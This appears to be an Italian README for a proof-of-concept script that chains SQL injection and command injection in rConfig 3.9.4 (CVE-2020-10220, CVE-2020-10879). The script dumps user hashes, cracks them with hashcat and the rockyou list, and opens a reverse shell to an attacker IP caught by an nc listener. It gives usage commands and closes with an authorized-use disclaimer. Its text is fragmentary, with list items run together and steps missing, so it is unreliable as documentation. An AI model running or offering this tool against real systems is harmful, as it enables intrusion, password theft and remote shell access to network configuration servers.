
PoC combinati per rConfig: SQL Injection (CVE-2020-10220) e Command Injection (CVE-2020-10879)
Questo PoC prende di mira rConfig versione 3.9.4 e dimostra lo sfruttamento tramite una combinazione di vulnerabilità di SQL Injection e Remote Command Injection. Automatizza il processo di:
rockyou e le regole best64.rulesQuesto script è basato sulla combinazione di due PoC originali:
È stato modificato per automatizzare il cracking e l'apertura facoltativa di una shell.
requests (pip install requests)hashcat installato e accessibile tramite riga di comandorockyou.txt (o equivalente) situata in /usr/share/wordlists/rockyou.txt/usr/share/hashcat/rules/best64.rulePer eseguire il dump degli utenti e degli hash solamente:
python3 rConfig_rce.py https://target
Per eseguire il dump degli utenti, decifrare le password e tentare la RCE (richiede IP e porta dell'attaccante per una reverse shell):
python3 rConfig_rce.py https://target attacker_ip attacker_port
admin per la fase di command injection.nc -lvnp 80) in esecuzione sulla tua macchina attaccante per catturare la reverse shell.Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'uso non autorizzato contro sistemi senza permesso è illegale e non etico.